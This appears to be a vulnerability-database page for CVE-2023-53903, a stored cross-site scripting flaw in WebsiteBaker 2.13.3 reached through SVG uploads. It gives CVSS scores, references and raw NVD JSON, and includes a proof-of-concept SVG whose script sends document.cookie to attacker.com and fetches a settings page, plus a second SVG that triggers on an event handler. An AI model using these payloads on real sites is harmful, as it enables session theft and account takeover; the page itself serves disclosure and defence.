CVE-2023-53903

Description

WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files with script tags that execute when the file is viewed, enabling persistent cross-site scripting attacks.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:websitebaker:websitebaker:2.13.3:*:*:*:*:*:*:* - VULNERABLE

WebsiteBaker <= 2.13.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2023-53903: WebsiteBaker Stored XSS via SVG Upload -->
<!-- Save this as malicious.svg and upload via WebsiteBaker file manager -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script type="text/javascript">
    // Steal session cookies and send to attacker server
    var stolen = document.cookie;
    var img = new Image();
    img.src = "http://attacker.com/log?c=" + encodeURIComponent(stolen);
    
    // Alternative: Execute arbitrary JavaScript
    fetch('/pages/settings.php').then(r => r.text()).then(data => {
      // Exfiltrate sensitive data
      console.log(data);
    });
  </script>
  <rect width="100%" height="100%" fill="#ffffff"/>
  <text x="50%" y="50%" text-anchor="middle">Malicious SVG File</text>
</svg>

<!-- Alternative PoC using event handlers -->
<svg xmlns="http://www.w3.org/2000/svg">
  <animate onbegin="alert('XSS Triggered')" attributeName="x" dur="1s" from="0" to="10"/>
  <rect width="100" height="100" fill="red"/>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53903
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53903
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53903/
[4] VulDB https://vuldb.com/cve/CVE-2023-53903
[5] https://websitebaker.org/pages/en/home.php
[6] https://www.exploit-db.com/exploits/51553
[7] https://www.vulncheck.com/advisories/websitebaker-stored-cross-site-scripting-via-svg-file-upload

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53903", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:02.700", "lastModified": "2025-12-24T17:54:34.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files with script tags that execute when the file is viewed, enabling persistent cross-site scripting attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:websitebaker:websitebaker:2.13.3:*:*:*:*:*:*:*", "matchCriteriaId": "52C2C264-F74B-4BD0-9A67-6B851B62DAE2"}]}]}], "references": [{"url": "https://websitebaker.org/pages/en/home.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51553", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/websitebaker-stored-cross-site-scripting-via-svg-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}